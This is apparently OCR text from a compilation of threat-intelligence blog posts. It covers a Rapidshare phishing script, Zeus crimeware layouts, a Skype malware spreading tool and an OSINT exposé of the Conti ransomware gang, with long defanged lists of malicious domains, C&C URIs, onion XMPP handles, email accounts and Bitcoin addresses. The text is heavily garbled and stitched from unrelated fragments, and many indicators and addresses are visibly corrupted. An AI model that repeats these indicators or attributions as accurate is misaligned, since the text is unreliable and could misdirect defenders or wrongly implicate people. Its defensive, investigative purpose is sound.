dns-reverse[.]net 
docame[.]xyz 
domosedoff[.]Jru 
e-co-us[.]work 

e-ga-us[.]me 
e-medservices[.]net 
eartymanacaty[.]Jcom 
easareal[.]eco-link-shop[.]ru 
eaurega|[.]Jeco-link-shop[.]ru 
ebridea[.]Jecolinkshop[.]ru 
edekindia[.]ecolinkshop[. ]ru 
edicago[.]eco-link-shop[. ]Jru 
edicago[.]ecolinkshop[. ]ru 
edoulia[.]eco-link-shop[.]ru 
edoulia[.Jecolinkshop[. ]ru 
egachiroptera[.]eco-link-shop[.]ru 
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What they’ve managed to achieve is another trust factor since Rapidshare generates a second 
dynamic link upon clicking on the original one. The script not only generates a dynamically 
looking link, but also, actually logs in the victim into their account in order to avoid suspicion 
whereas it still logs all the accounting data. 


IP: 88.196 | Date: Wed, 17 Sep 2008 09:58:02 -0500 
Download: http://rapidshare.com/ files 


Username: 

Password: 

IP: 84.187 | Date: Thu, 25 Sep 2008 08:14:42 -0500 
Download: http://rapidshare.com/ files, 


Username: 

Password: 

EP: 79.216 | Date: Sun, OS Oct 2008 02:38:12 -0500 
Download: http://rapidshare.com/files 


Username: 

Password: 

IP: 84.135 | Date: Mon, 06 Oct 2008 05:12:10 -0500 
Download: http://rapidshare.com/files 


Username: 

Password: 

IP: 88.67 | Date: Tue, OF Oct 2008 09:15:33 -0500 
Download: http://rapidshare.com/files 


Username: 

Password: 

EP: 93.172 | Date: Fri, 10 Oct 2008 01:45:19 -0500 
Download: http://rapidshare.com/ files 


Username: 

Password: 

IP: 84.197 | Date: Sat, 25 Oct 2008 03:57:15 -0500 
Download: http://rapidshare.com/ files 


Username: 

Password: 

IP: 78.48 | Date: Sun, O02 Nov 2008 05:12:09 -0600 
Download: http://rapidshare.com/files 


Scammers also tend to be ironic every then and now. For instance, in this particular case, one 
of the users finds it ironic that the Rapidshare phishing page is hosted at Rapidshare itself. Is 
the script actually working? It appears so at least going through a misconfigured accounting 
data dump left by one of the phishers. 


Related posts: 
1992 


egachiroptera[.]ecolinkshop[.]ru 
egenschei[.]eco-link-shop[. ]ru 
eghalayal[.]eco-link-shop[. ]ru 
eghalaya[.]Jecolinkshop[.]ru 
eibermei[.]eco-link-shop[.]ru 
eidenfro[.]eco-link-shop[.]ru 
eidenfro[.]ecolinkshop[.]ru 
einstein[.]census[.]shodan[.]io 
eistersi[.]eco-link-shop[.]ru 
eistersi[.Jecolinkshop[.]ru 
elasgia[.]eco-link-shop[. ]ru 
elasgia[.]ecolinkshop[.]ru 
eligola[.]eco-link-shop[.]ru 
eliothi[.]eco-link-shop[.]ru 
elkersso[.]eco-link-shop[.]ru 
elkersso[.Jecolinkshop[. ]ru 
ellespo[.]eco-link-shop[. ]ru 
ellespo[.]ecolinkshop[.]ru 
ellingha[.Jeco-link-shop[.]ru 
ellivora[.Jeco-link-shop[.]ru 
elmarva[.]eco-link-shop[.]ru 
elopsitta[.]eco-link-shop[.]ru 
elopsitta[.Jecolinkshop[.]ru 
elorussia[.]eco-link-shop[. ]ru 
elorussia[.]ecolinkshop[.]ru 
elostomatidal[.]Jecolinkshop[.]ru 
elsenki[.]eco-link-shop[.]ru 
elsenki[.Jecolinkshop[.]ru 
elsinki[.]ecolinkshop[.]ru 
emaill[.]dintmedisit[.]me 
emailinboxpro[. ]live 
encoding[.]3speak[.Jonline 
enderso[.]Jecolink24[.]ru 
endraspil.]eco-link-shop[.]ru 
endrocygninal[.]eco-link-shop[.]ru 
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energyglobalinvestments[.]com 
enigma-hg[.]net 
entoblo[.]eco-link-shop[.]ru 
eolithi[.Jecolink24[.]ru 
eopaleozoi[.]ecolink24[.]ru 
eopoldvil.Jecolink24[.]ru 
eraclea[.Jecolink24[.]ru 
erceria[.Jecolink24[.]ru 
ercuriali[.]Jecolink24[.]ru 
ermanopho[.]ecolink24[.]ru 
ermaphrodi[.Jecolink24[.]ru 
ermonto[.Jecolink24[.]ru 
eronimo[.]eco-link-shop[.]ru 
eronimo[.]Jecolink24[.]ru 
eropida[.]ecolinkshop[. ]ru 
eroxylo[.]eco-link-shop[.]ru 
eroxylo[.Jecolink24[.]ru 
eroxylo[.Jecolinkshop[.]ru 
errenvo[.]eco-link-shop[. Jru 
erthiida[. ]ecolink24[.]ru 
ertholletia[.Jeco-link-shop[.]ru 
erzegovinia[.]ecolinkshop[.]ru 
eschylea[.Jeco-link-shop[.]ru 
esdemona[.]eco-link-shop[.]ru 
esniewskil.Jeco-link-shop[.]ru 
esniewskil[.]ecolinkshop[. ]ru 
esopotamial[.]Jecolink24[.]ru 
esopotamial[.]Jecolinkshop[. ]ru 
essarabia[.]eco-link-shop[. ]ru 
esselia[.Jeco-link-shop[.]ru 
eteromyaria[.]ecolinkshop[.]ru 
ethnorepublic[.]Jcom 
experts[.]loveessay[.]dnsalias[.]Jcom 
fast[.]livefronts[.]xyz 
fluxyxbot[.]shieldev[. Jit 

19894 


fluxyxbot[.]xyz 
fuuhwyywl[.]com 

g-maps[. Jit 

gapingbutt[.]Jcom 

gfgxfh[.Jicu 
globall-security[.]Jcom 

go[. ]link[.]newsletter[.]surf 
guyjsu[.]club 

gx-opera[.]Jcom 

gxopera[.]Jcom 
gxoperabrowser[.]com 
hangsha[.]eco-link-shop[. ]ru 
harleywebshop[.]com 
harybdi[.]eco-link-shop[.]ru 
harybdil[.]ecolinkshop[.]ru 
hasselal[.]eco-link-shop[.]ru 
hatelperronia[.]eco-link-shop[.]ru 
hatelperronia[.]ecolinkshop[.]ru 
hattanooga[.]eco-link-shop[.]ru 
haulagi[.]eco-link-shopf[. ]ru 
haulagi[.]ecolinkshop[. ]ru 
hd1102[.]}club 
hechoslovakia[.]eco-link-shop[.]ru 
hekhovial[.Jecolinkshop[. ]ru 
heltenha[.]eco-link-shop[. Jru 
heltenhal[.]ecolinkshop[.]ru 
hernigo[.]Jecolinkshop[.]ru 
hesapea[.]eco-link-shop[.]ru 
hgamefreeO1[.]info 
hicagoa[.]eco-link-shop[. ]ru 
high[.]loveessay[.]dnsalias[.]Jcom 
hinodermatal[.]ecolinkshop[.]ru 
hintchi[.]eco-link-shop[.]ru 
hlamypho[.]eco-link-shop[.]ru 


hloridea[.Jeco-link-shop[.]ru 
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hloroxylo[.Jecolinkshop[.]ru 
home|[.]Jenergyglobalinvestments[.]com 
homevestiging1322[.]ddns[.]net 
hondrilla[.Jecolinkshop[. ]ru 
hristmasti[.]ecolinkshop[.]ru 
hristogra[.]Jeco-link-shop[.]ru 
hromaproo[.]eco-link-shop[.]ru 
hrysospleni[.]eco-link-shop[.]ru 
hrysosto[.]eco-link-shop[. ]ru 
hurchillia[.]eco-link-shop[.]ru 
huyibo[.]xyz 
ibanverificatie-marktplaats[.]one 
ideal-ing[.Jonline 
identity[.]link[.]newsletter[.]surf 
iebermal[.]eco-link-shop[.]ru 
ihixf[. Jorg 
iltonia[.]Jecolink24[.]ru 
imalayal[.Jecolink24[.]ru 
img1[.]selfpharmal[.Jcom 
img2[.]selfpharmal[.Jcom 
immeridgia[.Jecolink24[.]ru 
in21world[.]synology[.]Jme 
incinnatia[.]ecolink24[.]ru 
incolniana[.]eco-link-shop[.]ru 
indelia[.Jecolink24[.]ru 
ing-betaalpagina[.]n| 
ing-betalingsverzoek[.]ml 
inkowskia[.Jecolink24[.]ru 
inneapoli[.]ecolink24[.]ru 
innesota[.]eco-link-shop[.]ru 
innesota[.]ecolink24[.]ru 
innesota[.Jecolinkshop[.]ru 
inocerata[.]eco-link-shop[.]ru 
inocerata[.]ecolink24[.]ru 
inocerata[.Jecolinkshop[.]ru 
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inois-gov{[.]live 
ionysia[.Jecolinkshop[.]ru 
iophanti[.]eco-link-shop[.]ru 
iophanti[.Jecolink24[.]ru 
iophanti[.]Jecolinkshop[.]ru 
ipodida[.]ecolink24[.]ru 
ipodidal[.]ecolinkshop[.]ru 
ipoletti[.Jecolinkshop[. Jru 
ippocrati[.]eco-link-shop[.]ru 
ippoglossoi[.]eco-link-shop[.]ru 
ippoglossoi[.Jecolinkshop[.]ru 
ippotra[.]eco-link-shop[.]ru 
ippotra[.Jecolinkshop[.]ru 
irmingha[.]eco-link-shop[.]ru 
irripedia[.Jeco-link-shop[.]ru 
isecurity[.]website 
issouri[.]eco-link-shop[.]ru 
issouri[.Jecolinkshop[.]ru 
iticket[.]events 
iticket[.]md 
iunosti[.]Jcom 
jenlairdauthor[.]com 
jetcovid[.]website 
jiboutia[.]eco-link-shop[.]ru 
jl. ]zend[.J4pu[.Jcom 
jnd[.]txizd[.Jcn 
jospehkingo[.]ga 
jovial-black[.]162-33-178-178[.]plesk[.]page 
k-in-gov[. ]life 
k-in-gov[.]site 
k-in-gov[.]store 
k-in-gov[.]work 
kaarinam[.]online 
kabukevimurda[.]xyz 
kalikoji[.]cf 
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karanabaz[.]com 
khm[.]I[.]google[.]Jcom 
kidakitap[.]com 

kladtv[.Jcom 

kloi-area[.Jcom 

koltygo[.]Jcom 
ktachro[.Jecolinkshop[.]ru 
labamial[.]ecolinkshop[. ]ru 
labico[.]ru 
lackfoo[.]eco-link-shop[.]ru 
lackpoo[.]ecolinkshop[.]ru 
lacksto[.]Jeco-link-shop[. ]ru 
lacksto[.]ecolinkshop[.]ru 
lactonia[.]eco-link-shop[.]ru 
lanvirnia[.]ecolinkshop[.]ru 
lasmotheriida[.]ecolinkshop[.]ru 
laterida[.Jecolinkshop[.]ru 
laytonia[.]eco-link-shop[.]ru 
laytonia[.Jecolink24[.]ru 
Icorani[.]eco-link-shop[.]ru 
Icorani[.Jecolink24[.]Jru 
Idsmobil[.Jecolink24[.]ru 
lechoma[.]Jecolink24[.]ru 
leusinia[.Jecolink24[.]ru 
leyrodida[.]Jecolink24[.]ru 
Iginshi[.Jecolink24[.Jru 
Igonquil[.Jecolink24[.]ru 
livechat[.]energyglobalinvestments[.]com 
lizabetha[.]ecolink24[.]ru 
IIhallo[.Jecolink24[.]Jru 
login[.]link[. Jnewsletter[.]surf 
login[.]JmicrOsoft-online[.Jcom 
logstream-cysar[.]net 
lumus[.]ru 
lv-ri-best[.]classicstudio[.]org 
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lyf[.]plus 
m[.]the-bloodbalance[.]net 
magnetic-energy[.]Jcom 
mail[.]1dcmailsend[.]cf 
mail[.]dc2mailsender2[.]m| 
maill[.]jetcovid[.]website 
mail[.]martinswood[.]com 
malthaea[.Jecolinkshop[. ]ru 
mazonial[.]Jecolink24[.]ru 
megaessays[.]retmedihep[.]me 
megapesni[.]net 
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4.11.5 Zeus Crimeware Kit Gets a Carding Layout (2008-11-10 12:29) 
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With cybercriminals clearly expressing their nostalgia for several notorious and already shut 
down credit card fraud communities, they seem to have found a way to once again give 
their self-esteem a boost. Following the [l]ongoing modification of open source [2]crimeware 
kits and the inevitable innovation introduced [3]by third parties, last week a new layout was 
introduced for Zeus, once again courtesy of a group that’s piggybacking on Zeus popularity. 
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enigma-hq[.]net 

free[.]ds[.]melbicom[.]net 
g6wz1wll[.]lifeinsuranceux[.]com 
gw1[.Jmad1[.]vitalng[.]Jcom 

hathil[.Jco[.]in 

hml04[.]pabsticalch[.]info 

home[.]boomshow][. ]live 
hwsrv-935246[.]hostwindsdns[.]Jcom 
hwsrv-935575[.]hostwindsdns[.]Jcom 
ip29[.]Jip-51-38-95[.Jeu 

ip4[.]ip-198-244-194[.]eu 
jh153[.]perfectdeals[.]xyz 
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It’s particularly interesting to see how a one-man operation evolves into a group of third-party 
developers starting to claim ownership rights over the modified versions despite that they’re 
basically brandjacking the Zeus brand and building business models on the top of it. 


B01 mente Came, Cree Mae CORONA MNT HeeeNnY RNeNeNTY  CHagryRe One 


Open source crimeware and web malware exploitation kits on the other hand undermine the 
business model of a great number of "[4]malware/spyware for hire" vendors, which surprisingly 
doesn’t stop them from continuing offering their services and products which are often using 
the de facto crimeware kits as the foundations for their propositions. Are the buyers even 
aware of this fact? From a buyer’s perspective in times when most of the output is sold in bulk 
form, or access to the botnet rented for a specific period of time, the buyer doesn’t care about 
the cybercrime platform of use, but is looking for transparent ways to justify the investment 
he’s made into renting the service. 


Now that Zeus administrators and their cybercrime clerks in the face of those managing 
the campaigns knowingly or unknowingly Knowing the type of campaigns and the data that 
they manage, can [5]listen to their favorite music within Zeus and choose different layouts for 
the command and control interfaces while commiting cybercrime, what’s next? 


[6]Convergence and improved monetization. 


1. http: //ddanchev. blogspot .com/2008/11/modified-zeus-crimeware-kit-gets. html 
2. http: //ddanchev. blogspot .com/2008/09/modified-zeus-crimeware-kit-comes-with. html 
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mail[.]armalavage[.]com 
maill.Jextrasenses[.]ru 
mail[.]keystonecollections[.]com 
mail[.]stonesriverelectric[.]com 
mail[.]zeakids[.]de 
male-disk[.]picotor[.]net 
nc-ph-3259[.]web-hosting[.]com 
no-mans-land[.]m247[.]com 
no-rdns[.]mivocloud[.Jcom 
ns3206394[.]ip-37-187-24[.]eu 
nxmrwayhk[.]com 
ool-18b93d63[.]dyn[.]optonline[.]net 
p57a63989[.]dipO[.]t-ipconnect[.Jde 
p57a6398e[. ]dipO[.]t-ipconnect[.]de 
pool-71-168-131-157[.]cmdnnj[.]fios[.]verizon[.]net 
remote[.]baldeaglesecurity[.]Jcom 
rix[.]2vpn[.]net 
rns[.]nz[.]zappiehost[.]Jcom 
rotfl[.]co[.]uk 
rrcs-192-154-176-134[.]sw[.]biz[.Jrr[.Jcom 
rrcs-97-77-191-226[.]sw[.]biz[.Jrr[.Jcom 
5445689[.]srvape[.]Jcom 
sau-6bc8f-or[.]servercontrol[.]com[.]Jau 
scraggy4[.]co[.]uk 
server10180[.]megahoster[.]net 
smtp1120[.]crewaqual[.]net 


smtp[.]cpven[.]Jcom 


static[.]162[.]32[.]55[.]162[.]clients[.]yo ur-server[.]de 


storage-669286[. ]hosted-by[.]itldc[.]com 
stylesgrab[.]Jcom 
uk-in-f113[.]le100[.]net 
vds-695906[.]hosted-by-itldc[.]com 
vds-853358[.]hosted-by-itldc[.]com 
vds-890093[.]hosted-by-itldc[.]com 
vps[.]hostry[.]com 


19913 


yk-in-f113[.]1le100[.]net 


Related malicious URIs known to have participated in Conti ransomware gang’s C &C (Com- 
mand and Control) and Internet connected infrastructure include: 


hxxp://193[.]8[.]172[.]239/images/tooltipred[.]png 
hxxp://194[.]36[.]191[.]19/44470[.]4130951389[.]dat 
hxxp://194[.]36[.]191[.]19/44470[.]6666363426[.]dat 
hxxp://5[.]2[.]78[.]37/armed15/kazan073 
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11. 
~-nhEgg4kPFv433dG1UudP Jdkb8v6V6Co900Hzm8WHWL6kn2DMt y1xHO 

12. https://blogger.googleusercontent.com/img/a/AVvXsEgJTHHOPYWuHWVpNO_U1_fk1iHc7JUKFuMMmit Sm9N4yYqLQfm67p2 

aaRiF-OZvZH9d0ilnbLEsFGtOOBONQSWtD2YH29VG1M0_PPfA9Vcibhc 

13. https: //blogger.googleusercontent .com/img/a/AVvXsEiqwCWdqnbQHgprNKQLK_1EaQ1DZzsFnNfvKOC2mQ1gW2oHsFIR9_B 

14. https://blogger. googleusercontent.com/img/a/AVvXsEgD6JUM_DDt YOXBd9 j ynk6WUERf£ J3-17RFs2MpnGY9mUj j_2Cq-gigp 

15. 

xE6B_DR900-OVItGxfg7_II6yOcIX2Wesck61x8aMyz3pApoUZyokK7x 

16. 

17. 


KEZb_h6xGpRi97CmctkCCygO0uzv2BjgvVaHPRzd1v4x32usQq8a4CTb 


8. https: //blogger.googleusercontent . com/img/a/AVvXsEhfnAx J4Mxc0xD JSyV8Pe5HGtLg-YqY6RJK8ytrdsS172nqsAM45z j 


nlOLZYmz6 js8IxeS6qzuHOwj AdNbOO_TV3mK1gnJn6B772YaDnpWq5g 


9. https://blogger.googleusercontent.com/img/a/AVvXsEg5No8hiCQxkG6wQSkKVV8Gp j wRYVQraSF- p9cIvwEvEs6bJK2WXuw' 
K4go0 JNSmYC8aJBcHVtXEWbqHG8SeP51sp1XS-UV3VAUWjUq_r3JS_Y 
0. https: //blogger.googleusercontent .com/img/a/AVvXsEjvIp0d5IkY35F-qOF4kKUY-rDP_a9ynCPwrhZ2_QCM5z0YvdzpWuk' 
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18.2.15 Exposing the Conti Ransomware Gang - An OSINT Analysis (2022-02-28 14:26) 


[1] 


UPDATE: 


The following set of graphics aims to visualize the recently leaked Conti ransomware gang 


members conversations. 


[2] 


stern@q3mcco35auwcstmt.onion 


taker@a3mccos5auwcstmt.onion 
_——— 
zulas@q3mcco3S5auwcstmt.onion 
—_—_——————— 
grant@q3mccoS5auwcstmt.onion 
———SS 
sunday@q3mecco45auwcstmt.onion 
se 


mango@q3mccos5auwcstmt.onion 
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[3] 


[5] 


[7] 


[8] 
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UPDATE: 


The following is a complete list of all the Bitcoin addresses used by the Conti ransomware gang 
members obtained using public sources. 


bclqnj6yephp3jt204f8yn02wvydn47yd42w63587c 
bclqvpt6tnce3knIi5vr5v3k985uwr4mms5hc62ydqs 
bclqmjavw2hsqdfet4mv5j83evy0z3wO06rantrs6an 
bc1q65njz3pfw9kjjvcetkexsl0lI922wtd2wz2p46p 
1JWnZmkJwJSK6F21nypCAGzsR6TVhPRA4P 
LMuBnT25CQeTFYkKx1tHP4Fa5rkbc4rC9uF 
bclqtcld00sO9n944yjgyjfd6ujy5gespztcOumy2e 
bc1q7Id076gjadenuvuknv2c5a9lqslifk8verdkf07 
bclqqOmn6wgm8wxr7j2af4j2q3t7stscesqf2afv6v 
bc1lq2muhfugejgft7smu0ejze22het2rkmnpdccx5} 
bclqzwe9gedyc88hnm8m265g780qy0ezh7z4va0z5c 
bclqvpté6tnce3knIi5vr5v3k985uwr4mms5hc62ydqs 
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bclqmjavw2hsqdfet4mv5j83evy0z3wO6rantrs6an 
bc1q65njz3pfw9kjjvcetkexsl0l922wtd2wz2p46p 
1WnZmkjJwJSK6F21nypCAGzsR6TVhPRA4P 
LMuBnT25CQeTFYkKx1tHP4Fa5rkbc4rC9uF 
bclqtcld00sO09n944yjgyjfd6ujySgespztcOumy2e 
bc1q7|ld076gjadenuvuknv2c5a9lqsifk8verdkf07 
bclqqOmn6wgm8wxr7j2af4j2q3t7stscesqf2afv6v 
bclq2muhfugejgft7smu0ejze22het2rkmnpdccx5j 


bclqzwe9gedyc88hnm8m265g780qy0ezh7z4va0z5c 


bclqdak2ewrf9n295akue9r538pcsuh6k3gm4j5gk3 
bclqp77|lzx4q3t5dmwwwkzwg3aw30z31924x7viv5 
bc1lql8kpdvy5pns40lvfeuewz930e7nkh3xa5e96k7 
bclqjndxpuddlssczk336tdd7wcawlj2qws/p77p2k 
bclqprpt8gmO0hOjyj6py406xz9gucl40j8vusumaxx 
bc1q22hz66x8uth9xadfxmn5fe2s9kdv7/zg8rpjauw 
bclqnf273myysxjw23g9hze4vcu3uqkget9ra70hen 
bclqw5er3p5xayypk00144p944xk4xhfgjgmOjjswec 
bclqvzsOkefvwgtx3vjdexznw0s5zq2st45uj5pyk0O 
bclqs4elf8y33lwu35m89tj55hhjwts9jctpsdesxx 
bc1lqq0r3px80wzfa2cfe9r0xfqa2fpmmag9nhrekhw 
bclq7r8ars6zxml0k4ep5489vga9yudpvqaecywvw5 
bclqg44mhye7mzrlsqza97kgslOkmppcvfz3lxnt32 
bclqlsceg70s90mwnntug5r4jmfnd744arpu4q8q6u 
bclqtayhxcuswujqdxuqdc7djyt5976ek3dgtnc6él6 
bclqdpsal8xhg9p85 7r4g425y868yqwtzdqgzv8wg0 
bclqkfuf2cd87w2u2frrigatuhvuwj6clr8zyxlrum 
bclqOwxas9pmy86gk2ptm3gprxcp5mdx92sed3tjhr 
bclqy9s0z859gcvt62ydp9r4sy3cl83za36tjsnqpa 
bclqj6nnpnnn9a0zquvpd35azerusegnxfs3jtmwcv 
bclq4qvnjchr3y9wpm78aqInr6659aqrtnnt5pfgn6p5 
bc1q33uvkjlvyks7d2p3v5fz5xl3jOsazrsdh7qdn5 
bclqgefvkkldvz4t732rajkp53j82j073s6m5cku93 
bclqpelsktvc6d8tuuafqzkeuyddgdsck480s8t4th 
bclqlwef5kpsu6awedge9k3qsmthfwfq0d43kphdct 
bclqp80m6ljlvqd7rvp8nrlfq93elOnvzdhelnkqgj 
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bc1lq93uacqvu2d2hv9zga7srv3jvqwjump26fcj23t 
bc1qz8g58ym9lrlIn4kk87g4kks3hg82hr8hc858nd3 
bclqteth4dl689n0cuh3n63r6azcagmj4wj2m9yvht 
bclq7mpO0j2vq2xgt7mzha0kh8rqsp5ev3927hum30h 
bc1lq8m55q8gvsluzfqxqz9wfgkpcwgl9zxvsqv6é3ua 
bclqdstkdj3m3cdckdmva7x5pk0qxz3ylaplun4kd4 
bclqqkc9220I6dgh8jlsifsc4xf6éwxgkga5uv0O2vm5 
bclqsnhfuxzprt9tdrwcp8uk0x504ye7uecf6a4aee 
bclarkusavjestgd6ludOrjpr47x4vs2udpqesjsn8 
bclaqjez2nzlhntkmqzhnwr7nk784pvfn6srw3fncq6 
bc1lqktkx0jynsfgmvinern4zpnk8hy6u9h2zdtgtfz 
bclqvahawe2w84mgqgspcgx4uyu0vgw6r9y96srcj2 
bc1q3j4rq3k5d7ru85pecqtahcndkgx530e3g54633 
bclqdehfl7kjwyOtez8eugjwmgt8m4l6jv5hfgqk3t 
bc1lq0q5gsymkvp7vfpuexz0eq5csufxs6O0npza3ct5 
bclqtsks6vals5hqdvk28gsumvsxlucypnlee9x72p 
bclqlrzkzc6nkpn9kj9krzen2rq8yfc3hc4yhcrz3h 
bclqnm79vhfq5ss9arsfgfgcztd58w3s7hwn24lc9u 
bclqgam9e2ux49ur53hqxlraxjjtspxv88gkOncwja9 
bclq3stptjOpv6swqcyu6m5n74jamzmadsukn5ce/7t 
bclqstc4wgx4e2aqm4rtchOsxftr4g/7gfq3fg8nwe7 
bclqfamjhlyec63dz3gvcum7s9guu3cp5n8v3hz/ud 
bc1q4cjrllm405ktv2rm0jsh4ja5k8q9r7vmxfdcne 
bclqlhhgzzll4uqvd60teqn92y467kc04mj74jqudv 
bclqcé6fpzh8jkuy 718nk44yx3dztz36ejwgkq8p5vf 
bclqpOncqsk5hu0d3kwq2erypdqur2yjzypdc40du8 
bclqp04ykljcchpuufsmly6dutvjd8qtg3f563xxdw 
bclqyx35tjvwz5hepzefy8gsetcgaavrejgfpzuzrk 
bclaqtjvs79cm5zghe95hr04e5cl9h2fh7x9chfmcét 
bclqg285up24wyrfd9dwrnucwnpj247g70wxz48kg9 
bclqa0klunvxhwwhxpO0kced63250sczjdzitvr06tu 
bclqa6kcfywen34duq6msagpdv9fffcu4d2|jh5pgq 
bclqy2083z665ux68zda3tfuh5xed2493uaj8whdwv 
UPDATE: 


The following is a complete list of personal email address accounts known to have been used 
by members of the Conti ransomware gang. 
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0OxO0O0lord[.Jg3mcco35auwcstmt.onion 
2ram[.]ro.ru 
3000t[.]protonmail.com 
33baron [. Jtutanota.com 
33tadamon |. Jtutanota.com 
8383[.]q3mcco35auwcstmt.onion 
88teo[.]tutanota.com 
99totul.Jrambler.ua 
Alexandra _Belanger21[.]126.com 
Andrea.Davis.1989[.]protonmail.com 
Anna[.]calahanlaw.com 
AshlineWalt172[.]Jyahoo.com 
Baldwin _16367[.]interia.pl 
Blair[.]Jcalahanlaw.com 
Bradley Fuller1[.]sky.com 
Brian _Tsosie[.]sino.com 
Colin Fleming[.]web.de 
Johnson _78465[.]yahoo.com.br 
Jose _riepitingmet1987[.]Jatt.com 
KahreAzure133[.]yahoo.com 
LyAlper15[.]yahoo.com 
Marcel.Pohlmann|[. Jbrillant-holding.de 
Neil tersudoza1987[.]yahoo.com.my 
Rachell.]Jcalahanlaw.com 
Reed _22161[.]telenet.be 
RookerSpicher544[.]yahoo.com 
Rsebas[.]mail.com 
SusanJMcCauley1457bvn[.]protonmail.com 
Terri pacrytike1988[.]ziggo.nl 
The following is a complete list of Conti ransomware gang Dark Web onion XMPP users: 
Thorley.Narayanan/7147680[.]gmx.com 
Traci _Jones[.]meta.ua 
UPDATE: 
USERNAME[. Jgithub.com 
Valeri[.]Jcalahanlaw.com 
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Wayne _Bosse17[.]lycos.com 
a77ap[.]ro.ru 

abiroid[.]ro.ru 
abuse-contact[.]publicdomainregistry.com 
acava[.]ro.ru 
admin[.]Jq3mcco35auwcstmt.onion 
admintest[.]Jq3mcco35auwcstmt.onion 
admul[.]Jq3mcco35auwcstmt.onion 
ahtung[.]Jqg3mcco35auwcstmt.onion 
ahtyng[.]q3mcco35auwcstmt.onion 
airbnb1[.]qg3mcco35auwcstmt.onion 
alarm2[.]qg3mcco35auwcstmt.onion 
alarm[.]Jqg3mcco35auwcstmt.onion 
alaska[.Jq3mcco35auwcstmt.onion 
alert[.]Jqg3mcco35auwcstmt.onion 
alexeipi[.]jabber.ru 
ali[.]Jqg3mcco35auwcstmt.onion 
alkalane[.]autorambler.ru 
aloxa[.]Jqg3mcco35auwcstmt.onion 
alphacrypt[.]sj.ms 
alter[.]Jqg3mcco35auwcstmt.onion 
amileigh[.]calahanlaw.com 
andreadavis1989[.]protonmail.com 
andy[.]Jq3mcco35auwcstmt.onion 
angosusdand1987[.]protonmail.com 
antasasia[.]ro.ru 

arb _reserved[.]ubuntu-jabber.de 
argontom[. ]tutanota.com 
arnfinnr[.Jexploit.im 
asdKimbraSBrown5684dfgrecvbf[.]protonmail.com 
askalina[.]rambler.ua 
askorvine[.]protonmail.com 
asvmcodingsup[.]aol.com 
atlant[.]Jq3mcco35auwcstmt.onion 
auchie[.]protonmail.ch 
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3. http: //ddanchev.blogspot . com/2008/06/zeus-crimeware-kit-vulnerable-to.htm 


4. http://ddanchev. blogspot . com/2008/07/coding-spyware-and-malware-for-hire.htm 


5. http://ddanchev. blogspot . com/2008/09/modified-zeus-crimeware-kit-comes-with.htm 


6. http: //ddanchev .blogspot . com/2008/08/web- based-botnet- command-and-control.htm 


4.11.6 DIY Skype Malware Spreading Tool in the Wild (2008-11-12 14:35) 


a 


‘i aa 

Zz 
Who needs to [1]build hit lists by [2]harvesting user names when a usability feature allows 
you to expose millions of users to your latest social engineering campaign? That seems to 


be the mentality of yet another Skype malware spreading tool, which just like the majority of 
publicly obtainable tools is aiming to contact everyone, everywhere. 


The tool’s main differentiation factor is its feature of harvesting the personal information 
of users it has managed to detect randomly, that’s of course in between the mass spamming 
of malicious URLs. However, despite it’s DIY nature allowing someone to easily launch a 
malware campaign spreading across Skype, the tool is lacking the segmentation features 
offered by related [3]Skype spamming tools. Just like in a cybercrime 1.0 world where [4]DIY 
exploit embedding tools were favored due to the lack of web malware exploitation kits, in 
a cybercrime 2.0 world these DIY tools matured into IM malware spreading modules easily 
attached to any infected host given the botnet master is looking for such a functionality. 


Related posts: 

[5]Skype Spamming Tool in the Wild - Part Two 
[6]Skype Spamming Tool in the Wild 
[7]Harvesting Youtube Usernames for Spamming 
[8]Uncovering a MSN Social Engineering Scam 
[9JMSN Spamming Bot 

[10]DIY Fake MSN Client Stealing Passwords 
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awalays[.]protonmail.com 
axel[.]Jq3mcco35auwcstmt.onion 
axnutlalud1974[.]protonmail.com 
azot[.]q3mcco35auwcstmt.onion 
backup349[.]protonmail.com 
badroom|[.]keemail.me 
baerd90[.]bk.ru 
baget[.]Jqg3mcco35auwcstmt.onion 
ballao[. Jlist.ru 
baly[.]Jqg3mcco35auwcstmt.onion 
balzak[.]q3mcco35auwcstmt.onion 
band[.]Jqg3mcco35auwcstmt.onion 
barmen[.]q3mcco35auwcstmt.onion 
batka[.]Jqg3mcco35auwcstmt.onion 
baton[.]xmpp.jp 

batono[.]xmpp.jp 

batrade[.]mail.ru 
baxter[.]Jq3mcco35auwcstmt.onion 
beautifullife[.]jabber.ru 

begemot sun[.]jabber.ru 
bekeeper[.]q3mcco35auwcstmt.onion 
benstokesOOO[.]protonmail.com 
bentley[.]Jq3mcco35auwcstmt.onion 
berstiminec1979[.]protonmail.com 
bestofthebest[.]Jqg3mcco35auwcstmt.onion 
biceps[.]deshalbfrei.org 

bill. ]q3mcco35auwcstmt.onion 
bjager[.]bk.ru 
black[.]q3mcco35auwcstmt.onion 
bob[.]Jqg3mcco35auwcstmt.onion 
boba[.]Jq3mcco35auwcstmt.onion 
boby[.]qg3mcco35auwcstmt.onion 
bomba777[.]exploit.im 
bonen[.]Jq3mcco35auwcstmt.onion 


booker[.]q3mcco35auwcstmt.onion 
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bot[.]uaps.so 
bourbon[.]Jqg3mcco35auwcstmt.onion 
bra[.]Jqg3mcco35auwcstmt.onion 
braun[.]qg3mcco35auwcstmt.onion 
brett.ivanov[.]yandex.ru 
brom[.]Jqg3mcco35auwcstmt.onion 
buer[.]thesecure. biz 
buggatil.]Jqg3mcco35auwcstmt.onion 
buh[.]Jq3mcco35auwcstmt.onion 
bullet[.Jq3mcco35auwcstmt.onion 
bumer[.]Jq3mcco35auwcstmt.onion 
buril.]Jqg3mcco35auwcstmt.onion 
buwormeki1977[.]protonmail.com 
buza[.]Jqg3mcco35auwcstmt.onion 
c700[.]jabber.ru 
calmar[.]Jqg3mcco35auwcstmt.onion 
cameron[.]q3mcco35auwcstmt.onion 
cany[.]Jq3mcco35auwcstmt.onion 
carter[.]qg3mcco35auwcstmt.onion 
casey[.]calahanlaw.com 

cash _is_trash[.]xmpp.jp 
casper[.]q3mcco35auwcstmt.onion 
catuta[.]tuta.io 
ccncco[.]protonmail.com 
ceram[.]q3mcco35auwcstmt.onion 
cesar[.]q3mcco35auwcstmt.onion 
chaos[.]q3mcco35auwcstmt.onion 
child[.]Jqg3mcco35auwcstmt.onion 
chip[.]Jg3mcco35auwcstmt.onion 
chrom[.]qg3mcco35auwcstmt.onion 
clauz[.]xmpp.jp 
clickclack[.]qg3mcco35auwcstmt.onion 
clipper[.]Jq3mcco35auwcstmt.onion 
cobdoctor[.]Jqg3mcco35auwcstmt.onion 
codd.nexus[.]jabb.im 
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consfronepun1983[.]protonmail.com 
